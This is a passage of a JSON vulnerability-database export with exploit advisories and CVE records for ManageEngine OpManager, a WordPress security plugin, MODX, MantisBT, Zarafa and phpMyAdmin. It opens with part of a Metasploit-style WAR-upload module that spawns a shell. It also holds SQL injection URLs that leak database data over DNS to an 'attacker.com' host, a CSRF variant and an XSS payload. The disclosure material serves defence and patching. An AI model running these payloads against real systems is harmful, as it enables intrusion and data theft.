when the upload is successful.\r\nif res and (res.code == 500 or res.code == 200)\r\nprint_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s +\r\n\" seconds for deployment\")\r\nsleep(datastore['SLEEP'])\r\nelse\r\nfail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\")\r\nend\r\n\r\nprint_status(\"#{peer} - Executing payload, wait for session...\")\r\nsend_request_cgi({\r\n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\r\n'method' => 'GET'\r\n})\r\nend\r\n\r\n\r\ndef exploit\r\napp_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\nupload_war_and_exec(false, app_base)\r\nregister_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\")\r\n\r\nsleep_counter = 0\r\nwhile not session_created?\r\nif sleep_counter == datastore['SLEEP']\r\nprint_error(\"#{peer} - Failed to get a shell, let's try one more time\")\r\nupload_war_and_exec(true, app_base)\r\nreturn\r\nend\r\n\r\nsleep(1)\r\nsleep_counter += 1\r\nend\r\nend\r\nend\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager version 11.4 might not have the fix as the release is almost ready. They are planning to include the fix in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/22712", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-06T03:35:34", "description": "WordPress All In One WP Security plugin version 3.8.2 suffers from multiple remote SQL injection vulnerabilities.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "zdt", "title": "WordPress All In One WP Security Plugin 3.8.2 SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "id": "1337DAY-ID-22694", "href": "https://0day.today/exploit/description/22694", "sourceData": "Product: All In One WP Security WordPress plugin\r\nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \r\nVulnerable Version(s): 3.8.2 and probably prior\r\nTested Version: 3.8.2\r\nAdvisory Publication: September 3, 2014 [without technical details]\r\nVendor Notification: September 3, 2014 \r\nVendor Patch: September 12, 2014 \r\nPublic Disclosure: September 24, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-6242\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \r\n\r\n\r\n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242\r\n\r\n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\n\r\n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\r\n\r\nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:\r\n\r\n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\">\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to All In One WP Security 3.8.3\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/\n\n# 0day.today [2018-03-06] #", "sourceHref": "https://0day.today/exploit/22694", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-20T11:17:25", "description": "MODX Revolution version 2.3.1-pl suffers from a reflective cross site scripting vulnerability.", "cvss3": {}, "published": "2014-09-18T00:00:00", "type": "zdt", "title": "MODX Revolution 2.3.1-pl Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-5451"], "modified": "2014-09-18T00:00:00", "id": "1337DAY-ID-22656", "href": "https://0day.today/exploit/description/22656", "sourceData": "Vendor: MODX\r\nVulnerable Version(s): 2.3.1-pl and probably prior\r\nTested Version: 2.3.1-pl\r\nAdvisory Publication: August 20, 2014 [without technical details]\r\nVendor Notification: August 20, 2014 \r\nVendor Patch: September 11, 2014 \r\nPublic Disclosure: September 17, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-5451\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in MODX Revolution: CVE-2014-5451\r\n\r\nThe vulnerability exists due to insufficient sanitization of input data passed via the \"a\" HTTP GET parameter to \"/manager/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\nThis vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/manager/?a=%22%20onload=%22javascript:alert%28/immuniweb/%29;%22%3E\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate \"manager/templates/default/header.tpl\" file from GitHub.\r\n\r\nMore Information:\r\nhttps://github.com/modxcms/revolution/issues/11966\r\nhttps://github.com/modxcms/revolution/commit/e36f80f18e9514204bf2ce82747c8adf7e47a9c9\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/22656", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "osv": [{"lastseen": "2022-08-10T07:08:16", "description": "\nMultiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.2.11-1.2+deb7u1.\n\n\nWe recommend that you upgrade your mantis packages.\n\n\n", "cvss3": {}, "published": "2014-09-20T00:00:00", "type": "osv", "title": "mantis - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2022-08-10T07:08:11", "id": "OSV:DSA-3030-1", "href": "https://osv.dev/vulnerability/DSA-3030-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T23:03:52", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3030-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 20, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mantis\nCVE ID : CVE-2014-1608 CVE-2014-1609\n\nMultiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.2.11-1.2+deb7u1.\n\nWe recommend that you upgrade your mantis packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-09-20T21:26:14", "type": "debian", "title": "[SECURITY] [DSA 3030-1] mantis security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-09-20T21:26:14", "id": "DEBIAN:DSA-3030-1:388DF", "href": "https://lists.debian.org/debian-security-announce/2014/msg00218.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:21:51", "description": "Multiple SQL injection vulnerabilities in MantisBT before 1.2.16 allow\nremote attackers to execute arbitrary SQL commands via unspecified\nparameters to the (1) mc_project_get_attachments function in\napi/soap/mc_project_api.php; the (2) news_get_limited_rows function in\ncore/news_api.php; the (3) summary_print_by_enum, (4) summary_print_by_age,\n(5) summary_print_by_developer, (6) summary_print_by_reporter, or (7)\nsummary_print_by_category function in core/summary_api.php; the (8)\ncreate_bug_enum_summary or (9) enum_bug_group function in\nplugins/MantisGraph/core/graph_api.php; (10) bug_graph_bycategory.php or\n(11) bug_graph_bystatus.php in plugins/MantisGraph/pages/; or (12)\nproj_doc_page.php, related to use of the db_query function, a different\nvulnerability than CVE-2014-1608.", "cvss3": {}, "published": "2014-03-20T00:00:00", "type": "ubuntucve", "title": "CVE-2014-1609", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-03-20T00:00:00", "id": "UB:CVE-2014-1609", "href": "https://ubuntu.com/security/CVE-2014-1609", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:19:14", "description": "Zarafa WebAccess 7.1.10 and WebApp 1.6 beta uses weak permissions (644) for\nconfig.php, which allows local users to obtain sensitive information by\nreading the PHP session files. NOTE: this vulnerability exists because of\nan incomplete fix for CVE-2014-0103.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=658433>\n", "cvss3": {}, "published": "2014-10-20T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5447", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0103", "CVE-2014-5447"], "modified": "2014-10-20T00:00:00", "id": "UB:CVE-2014-5447", "href": "https://ubuntu.com/security/CVE-2014-5447", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:51:19", "description": "Zarafa Collaboration Platform 4.1 uses world-readable permissions for\n/etc/zarafa/license, which allows local users to obtain sensitive\ninformation by reading license files.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=658433>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-03-19T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5450", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5450"], "modified": "2018-03-19T00:00:00", "id": "UB:CVE-2014-5450", "href": "https://ubuntu.com/security/CVE-2014-5450", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:19:04", "description": "Cross-site scripting (XSS) vulnerability in the micro history\nimplementation in phpMyAdmin 4.0.x before 4.0.10.3, 4.1.x before 4.1.14.4,\nand 4.2.x before 4.2.8.1 allows remote attackers to inject arbitrary web\nscript or HTML, and consequently conduct a cross-site request forgery\n(CSRF) attack to create a root account, via a crafted URL, related to\njs/ajax.js.", "cvss3": {}, "published": "2014-11-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-6300", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-11-08T00:00:00", "id": "UB:CVE-2014-6300", "href": "https://ubuntu.com/security/CVE-2014-6300", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:19:32", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.0.x\nbefore 4.0.10.4, 4.1.x before 4.1.14.5, and 4.2.x before 4.2.9.1 allow\nremote authenticated users to inject arbitrary web script or HTML via a\ncrafted ENUM value that is improperly handled during rendering of the (1)\ntable search or (2) table structure page, related to\nlibraries/TableSearch.class.php and libraries/Util.class.php.", "cvss3": {}, "published": "2014-10-03T00:00:00", "type": "ubuntucve", "title": "CVE-2014-7217", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-03T00:00:00", "id": "UB:CVE-2014-7217", "href": "https://ubuntu.com/security/CVE-2014-7217", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:20:15", "description": "server_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x before\n4.2.6 allows remote authenticated users to bypass intended access\nrestrictions and read the MySQL user list via a viewUsers request.", "cvss3": {}, "published": "2014-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4987", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4987"], "modified": "2014-07-20T00:00:00", "id": "UB:CVE-2014-4987", "href": "https://ubuntu.com/security/CVE-2014-4987", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:20:14", "description": "Multiple cross-site scripting (XSS) vulnerabilities in js/functions.js in\nphpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before\n4.2.6 allow remote authenticated users to inject arbitrary web script or\nHTML via a crafted (1) table name or (2) column name that is improperly\nhandled during construction of an AJAX confirmation message.", "cvss3": {}, "published": "2014-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4986", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4986"], "modified": "2014-07-20T00:00:00", "id": "UB:CVE-2014-4986", "href": "https://ubuntu.com/security/CVE-2014-4986", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:20:30", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x\nbefore 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to\ninject arbitrary web script or HTML via a crafted table name that is\nimproperly handled after a (1) hide or (2) unhide action.", "cvss3": {}, "published": "2014-06-25T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4349", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4349"], "modified": "2014-06-25T00:00:00", "id": "UB:CVE-2014-4349", "href": "https://ubuntu.com/security/CVE-2014-4349", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:21:51", "description": "SQL injection vulnerability in the mci_file_get function in\napi/soap/mc_file_api.php in MantisBT before 1.2.16 allows remote attackers\nto execute arbitrary SQL commands via a crafted envelope tag in a\nmc_issue_attachment_get SOAP request.", "cvss3": {}, "published": "2014-03-18T00:00:00", "type": "ubuntucve", "title": "CVE-2014-1608", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608"], "modified": "2014-03-18T00:00:00", "id": "UB:CVE-2014-1608", "href": "https://ubuntu.com/security/CVE-2014-1608", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:24:31", "description": "Multiple SQL injection vulnerabilities in MantisBT before 1.2.16 allow remote attackers to execute arbitrary SQL commands via unspecified parameters to the (1) mc_project_get_attachments function in api/soap/mc_project_api.php; the (2) news_get_limited_rows function in core/news_api.php; the (3) summary_print_by_enum, (4) summary_print_by_age, (5) summary_print_by_developer, (6) summary_print_by_reporter, or (7) summary_print_by_category function in core/summary_api.php; the (8) create_bug_enum_summary or (9) enum_bug_group function in plugins/MantisGraph/core/graph_api.php; (10) bug_graph_bycategory.php or (11) bug_graph_bystatus.php in plugins/MantisGraph/pages/; or (12) proj_doc_page.php, related to use of the db_query function, a different vulnerability than CVE-2014-1608.", "cvss3": {}, "published": "2014-03-20T16:55:00", "type": "cve", "title": "CVE-2014-1609", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2021-01-12T18:05:00", "cpe": ["cpe:/a:mantisbt:mantisbt:1.2.11", "cpe:/a:mantisbt:mantisbt:1.2.10", "cpe:/a:mantisbt:mantisbt:1.2.0", "cpe:/a:mantisbt:mantisbt:1.2.3", "cpe:/a:mantisbt:mantisbt:1.2.6", "cpe:/a:mantisbt:mantisbt:1.2.15", "cpe:/a:mantisbt:mantisbt:1.2.7", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:mantisbt:mantisbt:1.2.4", "cpe:/a:mantisbt:mantisbt:1.2.8", "cpe:/a:mantisbt:mantisbt:1.2.9", "cpe:/a:mantisbt:mantisbt:1.2.2", "cpe:/a:mantisbt:mantisbt:1.2.13", "cpe:/a:mantisbt:mantisbt:1.2.1", "cpe:/a:mantisbt:mantisbt:1.2.5", "cpe:/a:mantisbt:mantisbt:1.2.14"], "id": "CVE-2014-1609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1609", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mantisbt:mantisbt:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:mantisbt:mantisbt:1.2.10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:44:55", "description": "Zarafa WebAccess 7.1.10 and WebApp 1.6 beta uses weak permissions (644) for config.php, which allows local users to obtain sensitive information by reading the PHP session files. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0103.", "cvss3": {}, "published": "2014-10-20T15:55:00", "type": "cve", "title": "CVE-2014-5447", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", 